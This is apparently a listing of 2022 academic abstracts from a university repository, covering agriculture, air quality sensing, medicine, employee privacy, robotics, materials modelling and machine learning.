The aim of this paper is to assess the objectives of farmers’ challenges in enhancing biodiversity. The so-called “trilemma” (WBGU 2021) of land use stems from the multiple demands made on land for the benefit of mitigating climate change, securing food and maintaining biodiversity. The agricultural sector is accused of maladministration: it is blamed for causing soil contamination, animal cruelty, bee mortality and climate change. That is why farmers are seen as key actors at all levels. They are, however, also key players when it comes to overcoming the problems of the future. Their supportive role is urgently needed, but farmers find themselves caught between a “rock” and a ”hard place”. Consumers are calling for sustainable, environmentally friendly production and inexpensive food products that do not contain pesticide residues, demanding enough food for all. Farmers are restricted by the wants and needs of consumers who are influenced by interest groups and are exposed to direct and indirect influencing factors and their interdependencies. They are also tasked with balancing the scrutiny of the critical public on the one hand, and the control exercised by eager authorities on the other.
As part of the DINA (Diversity of Insects in Nature protected Areas) project, a trans- and interdisciplinary research study, we collected and surveyed the data of farmers who are farming within or close to the 21 selected nature protected areas included in the DINA project. Data was collected as part of a mixed method approach using a semi-structured questionnaire. The methodological and strategic approach and interdependencies of issues demonstrate the complexity of today’s problems. To investigate this, we first used the data collection method using questionnaires with closed and open questions. The conflicts and obstacles farmers face were evaluated, and the results show farmers’ willingness and the importance of appreciation shown to farmers for implementation of biodiversity measures. The paper proposes some follow-up activities (quantitative study) to verify the objectives. The results will later lead to recommendations for policymakers and farmers in all German nature protected areas.
Vietnam requires a sustainable urbanization, for which city sensing is used in planning and de-cision-making. Large cities need portable, scalable, and inexpensive digital technology for this purpose. End-to-end air quality monitoring companies such as AirVisual and Plume Air have shown their reliability with portable devices outfitted with superior air sensors. They are pricey, yet homeowners use them to get local air data without evaluating the causal effect. Our air quality inspection system is scalable, reasonably priced, and flexible. Minicomputer of the sys-tem remotely monitors PMS7003 and BME280 sensor data through a microcontroller processor. The 5-megapixel camera module enables researchers to infer the causal relationship between traffic intensity and dust concentration. The design enables inexpensive, commercial-grade hardware, with Azure Blob storing air pollution data and surrounding-area imagery and pre-venting the system from physically expanding. In addition, by including an air channel that re-plenishes and distributes temperature, the design improves ventilation and safeguards electrical components. The gadget allows for the analysis of the correlation between traffic and air quali-ty data, which might aid in the establishment of sustainable urban development plans and poli-cies.
Therapeutic Treatments for Osteoporosis-Which Combination of Pills Is the Best among the Bad?
(2022)
Osteoporosis is a chronical, systemic skeletal disorder characterized by an increase in bone resorption, which leads to reduced bone density. The reduction in bone mineral density and therefore low bone mass results in an increased risk of fractures. Osteoporosis is caused by an imbalance in the normally strictly regulated bone homeostasis. This imbalance is caused by overactive bone-resorbing osteoclasts, while bone-synthesizing osteoblasts do not compensate for this. In this review, the mechanism is presented, underlined by in vitro and animal models to investigate this imbalance as well as the current status of clinical trials. Furthermore, new therapeutic strategies for osteoporosis are presented, such as anabolic treatments and catabolic treatments and treatments using biomaterials and biomolecules. Another focus is on new combination therapies with multiple drugs which are currently considered more beneficial for the treatment of osteoporosis than monotherapies. Taken together, this review starts with an overview and ends with the newest approaches for osteoporosis therapies and a future perspective not presented so far.
The processing of employees’ personal data is dramatically increasing, yet there is a lack of tools that allow employees to manage their privacy. In order to develop these tools, one needs to understand what sensitive personal data are and what factors influence employees’ willingness to disclose. Current privacy research, however, lacks such insights, as it has focused on other contexts in recent decades. To fill this research gap, we conducted a cross-sectional survey with 553 employees from Germany. Our survey provides multiple insights into the relationships between perceived data sensitivity and willingness to disclose in the employment context. Among other things, we show that the perceived sensitivity of certain types of data differs substantially from existing studies in other contexts. Moreover, currently used legal and contextual distinctions between different types of data do not accurately reflect the subtleties of employees’ perceptions. Instead, using 62 different data elements, we identified four groups of personal data that better reflect the multi-dimensionality of perceptions. However, previously found common disclosure antecedents in the context of online privacy do not seem to affect them. We further identified three groups of employees that differ in their perceived data sensitivity and willingness to disclose, but neither in their privacy beliefs nor in their demographics. Our findings thus provide employers, policy makers, and researchers with a better understanding of employees’ privacy perceptions and serve as a basis for future targeted research
on specific types of personal data and employees.
The processing of employee personal data is dramatically increasing. To protect employees' fundamental right to privacy, the law provides for the implementation of privacy controls, including transparency and intervention. At present, however, the stakeholders responsible for putting these obligations into action, such as employers and software engineers, simply lack the fundamental knowledge needed to design and implement the necessary controls. Indeed, privacy research has so far focused mainly on consumer relations in the private context. In contrast, privacy in the employment context is less well studied. However, since privacy is highly context-dependent, existing knowledge and privacy controls from other contexts cannot simply be adopted to the employment context. In particular, privacy in employment is subject to different legal and social norms, which require a different conceptualization of the right to privacy than is usual in other contexts. To adequately address these aspects, there is broad consensus that privacy must be regarded as a socio-technical concept in which human factors must be considered alongside technical-legal factors. Today, however, there is a particular lack of knowledge about human factors in employee privacy. Disregarding the needs and concerns of individuals or lack of usability, though, are common reasons for the failure of privacy and security measures in practice. This dissertation addresses key knowledge gaps on human factors in employee privacy by presenting the results of a total of three in-depth studies with employees in Germany. The results provide insights into employees' perceptions of the right to privacy, as well as their perceptions and expectations regarding the processing of employee personal data. The insights gained provide a foundation for the human-centered design and implementation of employee-centric privacy controls, i.e., privacy controls that incorporate the views, expectations, and capabilities of employees. Specifically, this dissertation presents the first mental models of employees on the right to informational self-determination, the German equivalent of the right to privacy. The results provide insights into employees' (1) perceptions of categories of data, (2) familiarity and expectations of the right to privacy, and (3) perceptions of data processing, data flow, safeguards, and threat models. In addition, three major types of mental models are presented, each with a different conceptualization of the right to privacy and a different desire for control. Moreover, this dissertation provides multiple insights into employees' perceptions of data sensitivity and willingness to disclose personal data in employment. Specifically, it highlights the uniqueness of the employment context compared to other contexts and breaks down the multi-dimensionality of employees' perceptions of personal data. As a result, the dimensions in which employees perceive data are presented, and differences among employees are highlighted. This is complemented by identifying personal characteristics and attitudes toward employers, as well as toward the right to privacy, that influence these perceptions. Furthermore, this dissertation provides insights into practical aspects for the implementation of personal data management solutions to safeguard employee privacy. Specifically, it presents the results of a user-centered design study with employees who process personal data of other employees as part of their job. Based on the results obtained, a privacy pattern is presented that harmonizes privacy obligations with personal data processing activities. The pattern is useful for designing privacy controls that help these employees handle employee personal data in a privacy-compliant manner, taking into account their skills and knowledge, thus helping to protect employee privacy. The outcome of this dissertation benefits a wide range of stakeholders who are involved in the protection of employee privacy. For example, it highlights the challenges to be considered by employers and software engineers when conceptualizing and designing employee-centric privacy controls. Policymakers and researchers gain a better understanding of employees' perceptions of privacy and obtain fundamental knowledge for future research into theoretical and abstract concepts or practical issues of employee privacy. Employers, IT engineers, and researchers gain insights into ways to empower data processing employees to handle employee personal data in a privacy-compliant manner, enabling employers to improve and promote compliance. Since the basic principles underlying informational self-determination have been incorporated into European privacy legislation, we are confident that our results are also of relevance to stakeholders outside Germany.
In March 2020, the world was hit by the coronavirus disease (COVID‐19) pandemic which led to all‐embracing measures to contain its spread. Most employees were forced to work from home and take care of their children because schools and daycares were closed. We present data from a research project in a large multinational organisation in the Netherlands with monthly quantitative measurements from January to May 2020 (N = 253–516), enriched with qualitative data from participants' comments before and after telework had started. Growth curve modelling showed major changes in employees' work‐related well‐being reflected in decreasing work engagement and increasing job satisfaction. For work‐non‐work balance, workload and autonomy, cubic trends over time were found, reflecting initial declines during crisis onset (March/April) and recovery in May. Participants' additional remarks exemplify that employees struggled with fulfilling different roles simultaneously, developing new routines and managing boundaries between life domains. Moderation analyses demonstrated that demographic variables shaped time trends. The diverging trends in well‐being indicators raise intriguing questions and show that close monitoring and fine‐grained analyses are needed to arrive at a better understanding of the impact of the crisis across time and among different groups of employees.
Soil nutrient depletion threatens global food security and has been seriously underestimated for potassium (K) and several micronutrients. This is particularly the case for highly weathered soils in tropical countries, where classical soluble fertilizers are often not affordable or not accessible. One way to replenish macro- and micronutrients are ground silicate rock powders (SRPs). Rock forming silicate minerals contain most nutrients essential for higher plants, yet slow and inconsistent weathering rates have restricted their use in the past. Recent findings, however, challenge past agronomic objections which insufficiently addressed the factorial complexity of the weathering process. This review therefore first presents a framework with the most relevant factors for the weathering of SRPs through which several outcomes of prior studies can be explained. A subsequent analysis of 48 crop trials reveals the potential as alternative K source and multi-nutrient soil amendment for tropical soils, whereas the benefits for temperate soils are currently inconclusive. Beneficial results prevail for mafic and ultramafic rocks like basalts and rocks containing nepheline or glauconite. Several rock modifications are highly efficient in increasing the agronomic effectiveness of SRPs. Enhanced weathering of SRPs could additionally sequester substantial amounts of CO2 from the atmosphere and silicon (Si) supply can induce a broad spectrum of plant biotic and abiotic stress resistance. Recycling massive amounts of rock residues from domestic mining industries could furthermore resolve serious disposal challenges and improve fertilizer self-sufficiency. In conclusion, under the right circumstances, SRPs could not only advance low-cost and regional soil sustaining crop production but contribute to various sustainable development goals.
Remineralizing soils? The agricultural usage of silicate rock powders in the context of One Health
(2022)
The concept of soil health describes the capacity of soil to fulfill essential functions and ecosystem services. Healthy soils are inextricably linked to sustainable agriculture and are crucial for the interconnected health of plants, animals, humans, and their environment ("One Health"). However, soil health is threatened through unprecedented rates of soil degradation. A major form of soil degradation is nutrient depletion, which has been seriously underestimated for potassium (K) and several micronutrients. One way to replenish K and micronutrients are multi-nutrient silicate rock powders (SRPs). Their agronomic suitability has long been questioned due to slow weathering rates, although recent studies found significant soil health improvements and challenge past objections which insufficiently addressed the factorial complexity of the weathering process. Furthermore, environmental co-benefits might arise through their mixture with livestock slurry, which could reduce the slurry’s ammonia (NH3) emissions and improve its biophysicochemical properties. However, neither SRPs effects on soil health, nor the biophysicochemical effects of mixing SRPs with livestock slurry have hitherto been comprehensively analyzed. The overall aim of this dissertation is thus to review the agricultural usage of SRPs in the context of One Health. The first part of this thesis starts with an elaboration of the health concept in general and then explores the interlinkages between soil health and One Health. Subsequently, the potentials and oftentimes bypassed problems of operationalizing soil health will be outlined, and feasible ways for its future usage are proposed. In the second part of the thesis, it is reviewed how and under which circumstances SRPs can ameliorate soil health. This is done by presenting a new framework with the most relevant factors for the usage of SRPs through which several contradictory outcomes of prior studies can be explained. A subsequent analysis of 48 crop trials reveals the potential of SRPs as K and multi-nutrient soil amendment for tropical soils, whereas the benefits for temperate soils are inconclusive. The review revealed various co-benefits that could substantially increase SRPs overall agronomic efficiency. The last part of the thesis reports about the effects of mixing two rock powders with cattle slurry. SRPs significantly increased the slurry´s CH4 emission rates, whereas the effects on NH3, CO2, and N2O emission rates were mostly insignificant. The rock powders increased the nutrient content of the slurry and altered its microbiology. In conclusion, the concept of soil health must be operationalized in more specific, practical, and context-dependent ways. Particularly in humid tropical environments, SRPs could advance low-cost soil health ameliorations, and its usage could have additional co-benefits regarding One Health. Mixing SRPs with organic materials like livestock slurry could overcome the major obstacle of their low solubility, although the effects on NH3 and greenhouse gas emissions must be further evaluated.
In robot-assisted therapy for individuals with Autism Spectrum Disorder, the workload of therapists during a therapeutic session is increased if they have to control the robot manually. To allow therapists to focus on the interaction with the person instead, the robot should be more autonomous, namely it should be able to interpret the person's state and continuously adapt its actions according to their behaviour. In this paper, we develop a personalised robot behaviour model that can be used in the robot decision-making process during an activity; this behaviour model is trained with the help of a user model that has been learned from real interaction data. We use Q-learning for this task, such that the results demonstrate that the policy requires about 10,000 iterations to converge. We thus investigate policy transfer for improving the convergence speed; we show that this is a feasible solution, but an inappropriate initial policy can lead to a suboptimal final return.
It is challenging to provide users with a haptic weight sensation of virtual objects in VR since current consumer VR controllers and software-based approaches such as pseudo-haptics cannot render appropriate haptic stimuli. To overcome these limitations, we developed a haptic VR controller named Triggermuscle that adjusts its trigger resistance according to the weight of a virtual object. Therefore, users need to adapt their index finger force to grab objects of different virtual weights. Dynamic and continuous adjustment is enabled by a spring mechanism inside the casing of an HTC Vive controller. In two user studies, we explored the effect on weight perception and found large differences between participants for sensing change in trigger resistance and thus for discriminating virtual weights. The variations were easily distinguished and associated with weight by some participants while others did not notice them at all. We discuss possible limitations, confounding factors, how to overcome them in future research and the pros and cons of this novel technology.
In recent years, the ability of intelligent systems to be understood by developers and users has received growing attention. This holds in particular for social robots, which are supposed to act autonomously in the vicinity of human users and are known to raise peculiar, often unrealistic attributions and expectations. However, explainable models that, on the one hand, allow a robot to generate lively and autonomous behavior and, on the other, enable it to provide human-compatible explanations for this behavior are missing. In order to develop such a self-explaining autonomous social robot, we have equipped a robot with own needs that autonomously trigger intentions and proactive behavior, and form the basis for understandable self-explanations. Previous research has shown that undesirable robot behavior is rated more positively after receiving an explanation. We thus aim to equip a social robot with the capability to automatically generate verbal explanations of its own behavior, by tracing its internal decision-making routes. The goal is to generate social robot behavior in a way that is generally interpretable, and therefore explainable on a socio-behavioral level increasing users' understanding of the robot's behavior. In this article, we present a social robot interaction architecture, designed to autonomously generate social behavior and self-explanations. We set out requirements for explainable behavior generation architectures and propose a socio-interactive framework for behavior explanations in social human-robot interactions that enables explaining and elaborating according to users' needs for explanation that emerge within an interaction. Consequently, we introduce an interactive explanation dialog flow concept that incorporates empirically validated explanation types. These concepts are realized within the interaction architecture of a social robot, and integrated with its dialog processing modules. We present the components of this interaction architecture and explain their integration to autonomously generate social behaviors as well as verbal self-explanations. Lastly, we report results from a qualitative evaluation of a working prototype in a laboratory setting, showing that (1) the robot is able to autonomously generate naturalistic social behavior, and (2) the robot is able to verbally self-explain its behavior to the user in line with users' requests.
This paper investigates the effect of voltage sensors on the measurement of transient voltages for power semiconductors in a Double Pulse Test (DPT) environment.We adapt previously published models that were developed for current sensors and apply them to voltage sensors to evaluate their suitability for DPT applications. Similarities and differences between transient current and voltage sensors are investigated and the resulting methodology is applied to commercially available and experimental voltage sensors. Finally, a selection aid for given measurement tasks is derived that focuses on the measurement of fast-switching power semiconductors.
Collaboration among multiple users on large screens leads to complicated behavior patterns and group dynamics. To gain a deeper understanding of collaboration on vertical, large, high-resolution screens, this dissertation builds on previous research and gains novel insights through new observational studies. Among other things, the collected results reveal new patterns of collaborative coupling, suggest that territorial behavior is less critical than shown in previous research, and demonstrate that workspace awareness can also negatively affect the effectiveness of individual users.
Recovery Across Different Temporal Settings: How Lunchtime Activities Influence Evening Activities
(2022)
Recovery from work stress during workday breaks, free evenings, weekends, and vacations is known to benefit employee health and well-being. However, how recovery at different temporal settings is interconnected is not well understood. We hypothesized that on days when employees engage in recovery-enhancing lunchtime activities, they will experience higher resources when leaving home from work (i.e., low fatigue and high positive affect) and consequently spend more time on recovery-enhancing activities in the evening, thus creating a positive recovery cycle. In this study, 97 employees were randomized into lunchtime park walk and relaxation groups. As evening activities, we measured time spent on physical exercise, physical activity in natural surroundings, and social activities. Afternoon resources and time spent on evening activities were assessed twice a week before, during, and after the intervention, for five weeks. Our results based on multilevel analyses showed that on days when employees completed the lunchtime park walk, they spent more time on evening physical exercise and physical activity in natural surroundings compared to days when the lunch break was spent as usual. However, neither lunchtime relaxation exercises nor afternoon resources were associated with any of the evening activities. Our findings suggest that other factors than afternoon resources are more important in determining how much time employees spend on various evening activities. Fifteen-minute lunchtime park walks inspired employees to engage in similar healthbenefitting activities during their free time.
This project focuses on object detection in dense volume data. There are several types of dense volume data, namely Computed Tomography (CT) scan, Positron Emission Tomography (PET), Magnetic Resonance Imaging (MRI). This work focuses on CT scans. CT scans are not limited to the medical domain; they are also used in industries. CT scans are used in airport baggage screening, assembly lines, and the object detection systems in these places should be able to detect objects fast. One of the ways to address the issue of computational complexity and make the object detection systems fast is to use low-resolution images. Low-resolution CT scanning is fast. The entire process of scanning and detection can be made faster by using low-resolution images. Even in the medical domain, to reduce the rad iation dose, the exposure time of the patient should be reduced. The exposure time of patients could be reduced by allowing low-resolution CT scans. Hence it is essential to find out which object detection model has better accuracy as well as speed at low-resolution CT scans. However, the existing approaches did not provide details about how the model would perform when the resolution of CT scans is varied. Hence in this project, the goal is to analyze the impact of varying resolution of CT scans on both the speed and accuracy of the model. Three object detection models, namely RetinaNet, YOLOv3, and YOLOv5, were trained at various resolutions. Among the three models, it was found that YOLOv5 has the best mAP and f1 score at multiple resolutions on the DeepLesion dataset. RetinaNet model h as the least inference time on the DeepLesion dataset. From the experiments, it could be asserted that sacrificing mean average precision (mAP) to improve inference time by reducing resolution is feasible.
Focus on what matters: improved feature selection techniques for personal thermal comfort modelling
(2022)
Occupants' personal thermal comfort (PTC) is indispensable for their well-being, physical and mental health, and work efficiency. Predicting PTC preferences in a smart home can be a prerequisite to adjusting the indoor temperature for providing a comfortable environment. In this research, we focus on identifying relevant features for predicting PTC preferences. We propose a machine learning-based predictive framework by employing supervised feature selection techniques. We apply two feature selection techniques to select the optimal sets of features to improve the thermal preference prediction performance. The experimental results on a public PTC dataset demonstrated the efficiency of the feature selection techniques that we have applied. In turn, our PTC prediction framework with feature selection techniques achieved state-of-the-art performance in terms of accuracy, Cohen's kappa, and area under the curve (AUC), outperforming conventional methods.
Due to expected positive impacts on business, the application of artificial intelligence has been widely increased. The decision-making procedures of those models are often complex and not easily understandable to the company’s stakeholders, i.e. the people having to follow up on recommendations or try to understand automated decisions of a system. This opaqueness and black-box nature might hinder adoption, as users struggle to make sense and trust the predictions of AI models. Recent research on eXplainable Artificial Intelligence (XAI) focused mainly on explaining the models to AI experts with the purpose of debugging and improving the performance of the models. In this article, we explore how such systems could be made explainable to the stakeholders. For doing so, we propose a new convolutional neural network (CNN)-based explainable predictive model for product backorder prediction in inventory management. Backorders are orders that customers place for products that are currently not in stock. The company now takes the risk to produce or acquire the backordered products while in the meantime, customers can cancel their orders if that takes too long, leaving the company with unsold items in their inventory. Hence, for their strategic inventory management, companies need to make decisions based on assumptions. Our argument is that these tasks can be improved by offering explanations for AI recommendations. Hence, our research investigates how such explanations could be provided, employing Shapley additive explanations to explain the overall models’ priority in decision-making. Besides that, we introduce locally interpretable surrogate models that can explain any individual prediction of a model. The experimental results demonstrate effectiveness in predicting backorders in terms of standard evaluation metrics and outperform known related works with AUC 0.9489. Our approach demonstrates how current limitations of predictive technologies can be addressed in the business domain.
With the increasing demand for ultrapure water in the pharmaceutical and semiconductor industry, the need for precise measuring instruments for those applications is also growing. One critical parameter of water quality is the amount of total organic carbon (TOC). This work presents a system that uses the advantage of the increased oxidation power achieved with UV/O3 advanced oxidation process (AOP) for TOC measurement in combination with a significant miniaturization compared to the state of the art. The miniaturization is achieved by using polymer-electrolyte membrane (PEM) electrolysis cells for ozone generation in combination with UV-LEDs for irradiation of the measuring solution, as both components are significantly smaller than standard equipment. Conductivity measurement after oxidation is the measuring principle and measurements were carried out in the TOC range between 10 and 1000 ppb TOC. The suitability of the system for TOC measurement is demonstrated using the oxidation by ozonation combined with UV irradiation of defined concentrations of isopropyl alcohol (IPA).
The human enzymes GLYAT (glycine N-acyltransferase), GLYATL1 (glutamine N-phenylacetyltransferase) and GLYATL2 (glycine N-acyltransferase-like protein 2) are not only important in the detoxification of xenobiotics via the human liver, but are also involved in the elimination of acyl residues that accumulate in the form of their coenzyme A (coA) esters in some rare inborn errors of metabolism. This concerns, for example, disorders in the degradation of branched-chain amino acids, such as isovaleric acidemia or propionic acidemia. In addition, they also assist in the elimination of ammonium, which is produced during the transamination of amino acids and accumulates in urea cycle defects. Sequence variants of the enzymes have also been investigated, which may provide evidence of impaired enzyme activities, from which therapy adjustments can potentially be derived. A modified Escherichia coli strain was chosen for the overexpression and partial biochemical characterization of the enzymes, which may allow solubility and proper folding. Since post-translational protein modifications are very limited in bacteria, we also attempted to overexpress the enzymes in HEK293 cells (human-derived). In addition to characterization via immunoblots and activity assays, intracellular localization of the enzymes was also performed using GFP coupling and confocal laser scanning microscopy in transfected HEK293 cells. The GLYATL2 enzyme may have tasks beyond detoxification and metabolic defects and the preliminary molecular biology work has been performed as part of this project - the enzyme activity determinations were outsourced to a co-supervised bachelor thesis. The enzyme activity determinations with purified recombinant human enzyme from Escherichia coli provided a threefold higher activity of the sequence variant p.(Asn156Ser) for GLYAT, which should be considered as the probably authentic wild type of the enzyme. In addition, a reduced activity of the GLYAT variant p.(Gln61Leu), which is very common in South Africa, was shown, which could be of particular importance in the treatment of isovaleric acidemia, which is also common in South Africa. Intracellularly, GLYAT and GLYATL1 could be localized mitochondrially. As the analyses have shown, sequence variations of GLYAT and GLYATL1 influence their enzyme activity. As an example, the GLYAT variant p.(Gln61Leu) is frequently found in South Africa. In the case of reduced GLYAT activity, patients could be increasingly treated with L-carnitine in the sense of an individualized therapy, since the conjugation of the toxic isovaleryl-coA with glycine is restricted by the GLYAT sequence variation. Activity-reducing variants identified in this project are of particular interest, as they may influence the treatment of certain metabolic defects.
Background There is a lack of cardiac magnetic resonance (CMR) data regarding mid- to long-term myocardial damage due to Covid-19 in elite athletes. Objective This study investigated mid-to long-term consequences of myocardial involvement after a Covid-19 infection in elite athletes.
Methods Between January 2020 and October 2021, 27 athletes of the German Olympic centre Rhineland with confirmed Covid-19 infection were analyzed. 9 healthy non-athlete volunteers served as control. CMR was performed in mean 182 days (SD 99) after initial positive test result.
Results CMR did not reveal any signs of acute myocarditis in regard to the current Lake Louise criteria or myocardial damage in any of the 26 elite athletes with previous Covid-19 infection. Nevertheless, 92 % of the athletes experienced a symptomatic course and 54 % reported lasting symptoms for more than 4 weeks. In one male athlete CMR revealed an arrhythmogenic right ventricular cardiomyopathy (ARVC) and this athlete was excluded from the study. Athletes had significantly enlarged left and right ventricle volumes and increased left ventricular myocardial mass in comparison to the healthy control group (LVEDVi 103.4 vs. 91.1 ml/m 2 p=0.031; RVEDVi 104.1 vs. 86.6 ml/m 2 p=0.007; and LVMi 59.0 vs. 46.2 g/m 2 p=0.002).
Conclusion Our findings suggest that the risk for mid-to long-term myocardial damage seems to be very low to negligible in elite athletes. No conclusions can be drawn regarding myocardial injury in the acute phase of infection nor about possible long-term myocardial effects in the general population.
Despite the increasing interest in single family offices (SFOs) as an investment owned by an entrepreneurial family, research on SFOs is still in its infancy. In particular, little is known about the capital structures of SFOs or the roots of SFO heterogeneity regarding financial decisions. By drawing on a hand-collected sample of 104 SFOs and private equity (PE) firms, we compare the financing choices of these two investor types in the context of direct entrepreneurial investments (DEIs). Our data thereby provide empirical evidence that SFOs are less likely to raise debt than PE firms, suggesting that SFOs follow pecking-order theory. Regarding the heterogeneity of the financial decisions of SFOs, our data indicate that the relationship between SFOs and debt financing is reinforced by the idiosyncrasies of entrepreneurial families, such as higher levels of owner management and a higher firm age. Surprisingly, our data do not support a moderating effect for the emphasis placed on socioemotional wealth (SEW).
A main factor hampering life in space is represented by high atomic number nuclei and energy (HZE) ions that constitute about 1% of the galactic cosmic rays. In the frame of the “STARLIFE” project, we accessed the Heavy Ion Medical Accelerator (HIMAC) facility of the National Institute of Radiological Sciences (NIRS) in Chiba, Japan. By means of this facility, the extremophilic species Haloterrigena hispanica and Parageobacillus thermantarcticus were irradiated with high LET ions (i.e., Fe, Ar, and He ions) at doses corresponding to long permanence in the space environment. The survivability of HZE-treated cells depended upon either the storage time and the hydration state during irradiation; indeed, dry samples were shown to be more resistant than hydrated ones. With particular regard to spores of the species P. thermantarcticus, they were the most resistant to irradiation in a water medium: an analysis of the changes in their biochemical fingerprinting during irradiation showed that, below the survivability threshold, the spores undergo to a germination-like process, while for higher doses, inactivation takes place as a consequence of the concomitant release of the core’s content and a loss of integrity of the main cellular components. Overall, the results reported here suggest that the selected extremophilic microorganisms could serve as biological model for space simulation and/or real space condition exposure, since they showed good resistance to ionizing radiation exposure and were able to resume cellular growth after long-term storage.
How self-reliant Peer Teaching can be set up to augment learning outcomes for university learners
(2022)
Modeling of Creep Behavior of Particulate Composites with Focus on Interfacial Adhesion Effect
(2022)
Evaluation of creep compliance of particulate composites using empirical models always provides parameters depending on initial stress and material composition. The effort spent to connect model parameters with physical properties has not resulted in success yet. Further, during the creep, delamination between matrix and filler may occur depending on time and initial stress, reducing an interface adhesion and load transfer to filler particles. In this paper, the creep compliance curves of glass beads reinforced poly(butylene terephthalate) composites were fitted with Burgers and Findley models providing different sets of time-dependent model parameters for each initial stress. Despite the finding that the Findley model performs well in a primary creep, the Burgers model is more suitable if secondary creep comes into play; they allow only for a qualitative prediction of creep behavior because the interface adhesion and its time dependency is an implicit, hidden parameter. As Young’s modulus is a parameter of these models (and the majority of other creep models), it was selected to be introduced as a filler content-dependent parameter with the help of the cube in cube elementary volume approach of Paul. The analysis led to the time-dependent creep compliance that depends only on the time-dependent creep of the matrix and the normalized particle distance (or the filler volume content), and it allowed accounting for the adhesion effect. Comparison with the experimental data confirmed that the elementary volume-based creep compliance function can be used to predict the realistic creep behavior of particulate composites.
The cube in cube approach was used by Paul and Ishai-Cohen to model and derive formulas for filler content dependent Young's moduli of particle filled composites assuming perfect filler matrix adhesion. Their formulas were chosen because of their simplicity, and recalculated using an elementary volume approach which transforms spherical inclusions to cubic inclusions. The EV approach led to expression of the composites moduli that allows introducing an adhesion factor kadh ranging from 0 and 1 to take into account reduced filler matrix adhesion. This adhesion factor scales the edge length of the cubic inclusions, thus reducing the stress transfer area between matrix and filler. Fitting the experimental data with the modified Paul model provides reasonable kadh for PA66, PBT, PP, PE-LD and BR which are in line with their surface energies. Further analysis showed that stiffening only occurs if kadh exceeds [Formula: see text] and depends on the ratio of matrix modulus and filler modulus. The modified model allows for a quick calculation of any particle filled composites for known matrix modulus EM, filler modulus EF, filler volume content vF and adhesion factor kadh. Thus, finite element analysis (FEA) simulations of any particle filled polymer parts as well as materials selection are significantly eased. FEA of cubic and hexagonal EV arrangements show that stress distributions within the EV exhibit more shear stresses if one deviates from the cubic arrangement. At high filler contents the assumption that the property of the EV is representative for the whole composite, holds only for filler volume contents up to 15 or 20% (corresponding to 30 to 40 weight %). Thus, for vast majority of commercially available particulate composites, the modified model can be applied. Furthermore, this indicates that the cube in cube approach reaches two limits: (i) the occurrence of increasing shear stresses at filler contents above 20% due to deviations of EV arrangements or spatial filler distribution from cubic arrangements (singular), and (ii) increasing interaction between particles with the formation of particle network within the matrix violating the EV assumption of their homogeneous dispersion.
Introduction of Matrix-Filler Adhesion to Modelling of Elastic Moduli of Particulate Composites
(2022)
Cube in cube elementary volume (EV) concept serves to predict a filler-content dependent Young´s moduli of particle filled composites using moduli of a matrix EM and a filler EF. Paul and Ishai-Cohen derived formulas for composites moduli considering different load transfer boundaries in the EV assuming a complete filler-matrix adhesion. In this paper it is confirmed that their models represent the upper and lower bounds, respectively, with the respect to the experimental data. However, in vast majority of composites a filler-matrix adhesion is not complete. Therefore, an adhesion factor kadh gaining values between 0 and 1 was introduced into Paul´s model to consider the reduced adhesion as the reduction of the filler-matrix contact area for glass beads filled in polar and unpolar thermoplastic matrices as well as elastomer. The evaluation of these composite systems provides reasonable adhesion coefficients of PA66 > PBT > PP > PE-LD >> BR. It was also found that stiffening only occurs if kadh exceeds the minimum value adhesion of root square of E(M) divided by E(F). The determined kadh correspond to scanning electron microscopy observations of the composites fracture surfaces. Additionally, finite element analysis of the cubic and hexagonal arrangements of the EV show that the stress distributions are different, but they affect the calculated moduli only for the filler volume contents exceeding 20 %. The introduction of the filler-matrix adhesion provides more reliable predictions of Young´s moduli of particulate composites.
The cube in cube approach was used by Paul and Ishai-Cohen to model and derive formulas for filler content dependent Young´s moduli of particle filled composites assuming perfect filler matrix adhesion. Their formulas were chosen because of their simplicity, recalculated using an elementary volume approach which transforms spherical inclusions to cubic inclusions. The EV approach led to expression for the composites moduli that allow for introducing an adhesion factor kadh ranging from 0 and 1 to take into account none perfect reduced filler matrix adhesion. This adhesion factor scales the edge length of the cubic inclusions, thus, reducing the stress transfer area between matrix and filler. Fitting the experimental data with the modified Paul model provides reasonable kadh for PA66, PBT, PP, PE-LD and BR which are in line with their surface energies. Further analysis showed that stiffening only occurs if kadh exceeds <span class="math-tex">\( { \ \sqrt{E^M/E^F} \ }\) and depends on the ratio of matrix modulus and filler modulus. The modified model allows for a quick calculation of any particle filled composites for known matrix modulus EM, filler modulus EF, filler volume content vF and adhesion factor kadh. Thus, finite element analysis (FEA) simulations of any particle filled polymer parts as well as materials selection are significantly eased. FEA of cubic and hexagonal EV arrangements show that stress distributions within the EV exhibit more shear stresses if one deviates from the cubic arrangement. At high filler contents the assumption that the property of the EV is representative for the whole composite, holds only for filler volume contents up to 15 or 20 % (corresponding to 30 to 40 weight %). Thus, for vast majority of commercially available particulate composites, the modified model can be applied. Furthermore, this indicates that the cube in cube approach reaches two limits: i) the occurrence of increasing shear stresses at filler contents above 20 % due to deviations of EV arrangements or spatial filler distribution from cubic arrangements (singular), and ii) increasing interaction between particles with the formation of particle network within the matrix violating the EV assumption of their homogeneous dispersion.
Robots applied in therapeutic scenarios, for instance in the therapy of individuals with Autism Spectrum Disorder, are sometimes used for imitation learning activities in which a person needs to repeat motions by the robot. To simplify the task of incorporating new types of motions that a robot can perform, it is desirable that the robot has the ability to learn motions by observing demonstrations from a human, such as a therapist. In this paper, we investigate an approach for acquiring motions from skeleton observations of a human, which are collected by a robot-centric RGB-D camera. Given a sequence of observations of various joints, the joint positions are mapped to match the configuration of a robot before being executed by a PID position controller. We evaluate the method, in particular the reproduction error, by performing a study with QTrobot in which the robot acquired different upper-body dance moves from multiple participants. The results indicate the method's overall feasibility, but also indicate that the reproduction quality is affected by noise in the skeleton observations.
Self-supervised learning has proved to be a powerful approach to learn image representations without the need of large labeled datasets. For underwater robotics, it is of great interest to design computer vision algorithms to improve perception capabilities such as sonar image classification. Due to the confidential nature of sonar imaging and the difficulty to interpret sonar images, it is challenging to create public large labeled sonar datasets to train supervised learning algorithms. In this work, we investigate the potential of three self-supervised learning methods (RotNet, Denoising Autoencoders, and Jigsaw) to learn high-quality sonar image representation without the need of human labels. We present pre-training and transfer learning results on real-life sonar image datasets. Our results indicate that self-supervised pre-training yields classification performance comparable to supervised pre-training in a few-shot transfer learning setup across all three methods. Code and self-supervised pre-trained models are be available at https://github.com/agrija9/ssl-sonar-images
